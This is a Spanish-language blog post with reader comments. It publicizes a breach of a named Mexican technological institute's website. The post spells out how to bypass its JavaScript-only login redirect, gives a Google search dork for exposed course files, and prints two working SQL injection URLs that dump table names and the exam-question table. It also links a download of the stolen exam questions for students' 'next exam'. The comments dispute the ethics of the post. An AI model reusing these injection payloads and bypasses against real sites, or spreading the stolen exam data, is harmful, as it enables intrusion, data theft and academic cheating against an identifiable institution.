Instituto Tecnológico Superior de Calkiní (itescam.edu.mx) Hackeado


Es una realidad que la actualidad tecnológica representa un desafío para los presentes y futuros profesionales en el área de sistemas computacionales, pero hasta ahora en Campeche a nadie le preocupa el proceso de formación de los educandos en materia de Seguridad Informática.

A México y vuelvo a recalcar más aún a Campeche le falta mucha educación sobre seguridad informática, los usuarios de Internet o “cibernáutas” son vulnerables a los hackers dedicados a rastrear los datos en la web y robar la información de sus víctimas predeterminadas o casuales por falta de educación e ignorancia sobre el tema.

Esto deriva en que los “futuros profesionales” no tengan una preparación adecuada, y cuando adquieren un trabajo relacionado con su carrera, tienen a cometer errores y estar propensos a las “vulnerabilidades” por no estar preparados.

En mi opinión, creo que este tipo de educación se debe impartir al cursar la carrera pero ninguna Universidad se lo toma enserio. Esto no quiere decir que las Universidades sean malas, al contrario el ITESCAM es una de las Universidades más reconocidas en el estado, pero al igual que todas en el estado, se encuentra deficiente en materia de Seguridad Informática, es probable que los alumnos lleven alguna materia de esta rama, pero dudo que la persona que lo predica tenga algo de experiencia en el tema.

En fín, hoy expondré un ejemplo, cabe mencionar que lo presentado a continuación es con fines educativos con el afán de mejorar y expandir los conocimientos acerca de la seguridad.

Un hacker denominado “JAG” pudo acceder a la base de datos del ITESCAM, al sistema SYLABUS, a la web de docentes y alumnos ¿Cómo lo hizo?

1.- Fallas en verificación de sesión
2.- SQL Injection
3.- Google Hacking

Fallas en verificación de Sesión

El ITESCAM utiliza un login común para poder validad el acceso a secciones del sitio, pero hay una vulnerabilidad que permite el acceso al sistema sin tener que iniciar tu sesión, y es que generalmente en un sistema de validación utiliza redireccionamientos a través de headers en el navegador, pero por alguna razón el ITESCAM pensó que utilizar javascript para redireccionar era una buena idea.

URL: https://www.itescam.edu.mx/principal/docentes/

Al acceder directamente a la URL anterior el navegador automaticamente es “redirigido” al login:

Pero si echamos un ojo al código fuente del sitio web, podemos observar lo siguiente:

Vulnerabilidad ITESCAM

El sitio web redirige por medio de Javascript si no haz iniciado la sesión, ¿pero que pasa si desactivo el javascript en mi navegador y vuelvo a entrar a esa página? sopresa, tienes “GRANT ACCESS PRIVILEGE”

Creo que es obvio que tienes acceso a todas las opciones contenidas en el panel de docente ¿no?

Asistencia de Alumnos,Avisos,Convocatorias,Guías y Formatos,Calendario y Plazos,Horarios de Clase,Temas para Exámenes de Título,Alumnos Asesorados,Syllabus,Control de Asistencias,Consultar Curriculum,Modificación de Datos Recursos Humanos,Encuestas,Cerrar Sesión

Esto aplica de igual manera para el panel de Alumnos.

Sistema Syllabus

El Syllabus es un “SISTEMA VIRTUAL DE APOYO AL APRENDIZAJE” seré breve, claro y preciso: es una base de conocimiento donde converge toda la información educativa de la institución, documentos, presentaciones etc…

El problema es que no tienen configurado de manera correcta el apache y si a esto le aumentas el hecho del error en javascript, puedes descargarte todos los cursos de cualquier carrera, basta con curosear o hacer “Google Hacking”

http://www.google.com.mx/search?hl=es&safe=off&q=site%3Aitescam.edu.mx%2Fprincipal%2Fsylabus%2Ffpdb%2Frecursos&aq=f&aqi=&aql=&oq=

SQL Injection

Este es otro de los errores pero no el menos importante, iré directamente el grano:

http://www.itescam.edu.mx/principal/sylabus/rptSylabus.php?tipo=PDF&id_asignatura=-278%20union all select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema = database()/*

http://www.itescam.edu.mx/principal/sylabus/rptSylabus.php?tipo=PDF&id_asignatura=-278%20union%20all%20select%201,REACTIVO,3,4,5,6,7%20from%20REACTIVOS/*

De nueva cuenta y gracias a su sistema Syllabus se puede tener acceso a la base de datos de la institución:
Ejemplo:

  • AREAS
  • ASIGNATURAS
  • BIBLIOGRAFIAS
  • CALENDAR
  • CAPACITACIONES
  • COMPETENCIAS
  • COMUNALES
  • DOCENTES
  • EVALUACIONES
  • EXAMENESGENERADOS
  • GRUPOS
  • HISTORIAL_ACCESOS
  • MATERIAS
  • METODOLOGIAS
  • PERIODOS
  • PLAN_ESTUDIOS
  • PRERREQUISITOS
  • REACTIVOS
  • REACTIVOSEXAMENG
  • RECURSOS
  • SUBTEMAS
  • TEMAS
  • TEMP_REACTIVOS
  • UNIDADES

Si deseas descargar la tabla de reactivos para tu próximo examen lo puedes hacer aquí:

http://rapidshare.com/files/455369996/Sylabus.rar

Password: blog.puchunguis.com

Espero que algún día las instituciones le presten atención a esta materia, ya que el ITESCAM no es el único con estas vulnerabilidades, la UAC, el IT Campeche la gran mayoría de las universidades presentan errores de seguridad en sus servidores o servicios y no creo que todos los Hackers sean tan considerados y probablemente si hay una próxima intrusión se pierda información o conviertan los combiertan en servers en Zombies.

Fuente: Correo anónimo: [email protected]

Puchungo

Las personas no cambian, solo se adaptan.

11 Comentarios

wow

about 7 años ago

Sr. Puchinguis, es justamente el mal de las universidades Maestros sin cursos de actualización no siempre tienen tiempo de actualizarse por ellos mismos. Otro punto, no siempre los alumnos y maestros hacen estas páginas, al parecer en el caso de la uac, se contrata a empresas de mérida para el portal. Ojala Directores y Rectores le den la importancia que requiere la profesionalizacion de sus maestros de informática, o de plano tengan cuidado en sus examenes selectivos de contratacion a nuevos docentes, con experiencia comprobada. Asi se arreglarian muchos de los males de Mexico, no solo de este tipo.

Puchungo

about 7 años ago

Efectivamente "wow" esto es una realidad que desgraciadamente se ve reflejado en la mayoría de las universidades del estado y concuerdo con lo que dices, pero si los profesores ni siquiera conocen la diferencia entre Pishing, Pharming, Scamming o Skimming ¿qué pueden aportar a los alumnos? Simplemente no puedes enseñar a defenderte de algo que no conoces.

ascr

about 7 años ago

"wow" : ya había escuchado ese comentario y es muy decepcionante lo que hace el alto mando de las universidades... ojala y se pongan las pilas(tanto el gobierno como las universidades), porque sino no avanzaremos como lo están haciendo otros estados...

josvec

about 6 años ago

interesante informacion pero hoy en dia ya no funciona. me interesa mucho esta info me podrias ayudar

Mario

about 6 años ago

Lo peor del asunto es que muchas de estos sitios son desarrollados por alumnos que no han terminado su carrera y lo hacen por servicio social o practicas profesionales.

Drago

about 6 años ago

todo programa informático puede mejorarse... y de nada se aprende más que de los errores cometidos, desafortunadamente en este caso se trata de un sitio comprado, mal parchado, con poco o nulo mantenimiento, muy limitado, sin embargo, al artículo no deja de ser sensacionalista, nada ético, y el colmo es haber colgado el syllabus y con esta frase "Si deseas descargar la tabla de reactivos para tu próximo examen lo puedes hacer aquí:" crees que con ello tu si colaboras a que "los 'futuros profesionales' tengan una preparación adecuada?", yo creo que no, y créeme que muy pocos conocemos las entrañas de ese sitio aparte de los que ahí laboran, si encuentras fallos no los expongas no es ético, si te preocupa o te inquieta enviale un email al webmaster. Recibe un saludo... hahahackr 11011100

Puchungo

about 6 años ago

@Drago cada quien es responsable de su futuro, no tengo porque colaborar con la preparación de nadie, mucho menos me preocupa o me inquieta, y desafortunadamente TU mismo te haz respondido, la gente aprende de sus errores o es lo que se espera, esto se ve reflejado más en Campeche, "No se revisan los postes de luz, hasta que le caiga uno a una niña en el carnaval y la mate", "No se revisarán que los casinos estén en regla, hasta que los narcos quemen uno", "No revisan la seguridad de sus sitios web, hasta que alguien los vulnere". Es exactamente lo mismo, como aprender de tus errores si no los puedes ver o no te los hacen ver.

Sapo

about 6 años ago

Como persona profesional, estudiada y bajo juramento de ética a la cual no le prestaste atención cuando te la leyeron y juraste con las patas, quedando solo tu deber como personal moral; siempre tendrás la responsabilidad de colaborar en el desarrollo profesional o humano de todas las personas que estan a tu alrededor, como en este caso no te preocupa no tienes el derecho de criticar y mucho menos exigir algo que no ofreces a pesar de lo mucho o poco que hayas recibido. Por otro lado hay que ser imbécil para usar las primeras letras de tu nombre como pseudónimo de hacker y tampoco tienes madre por usar tus conocimientos para colaborar a que este país continue jodido. Dios quiera que pronto estes en la carcel, es el lugar que te mereces.

Puchungo

about 6 años ago

Contenido vacío, análisis nulo, frivolidad excesiva, Dios te multiplique lo que me deseas. Por otro lado, sigue en tu zona de confort, eres como la gran mayoría ... "conformista", no puedes recibir educación de calidad si no la EXIGES. Pero tal vez me equivoco al juzgarte, "existe la posibilidad que tu seas una de las personas que tienen su licencia oficial de tu Antivirus, Windows, MS Office, Adobe CS etc.. etc.. etc.. y que nunca y de ninguna manera contribuirá al uso inadecuado del software robado por hackers" ¿verdad?

Jorge

about 4 años ago

Alguien Tiene el archivo??, lo podria resubir??, Muchas Gracias!! De antemano

video para empresas

about 2 años ago

Sin dudas , que en la universidades e instituos, no se tiene muy en cuenta la seguridad informatica cuando se programan es un gran error a tomar en cuenta . Ya que cada vez se esta mas expuesto nuestros datos a muchisimos riesgos mas ahora con la conectividad continua con los dispositivos moviles actuales.

Comentar

Please be polite. We appreciate that.
Your email address will not be published and required fields are marked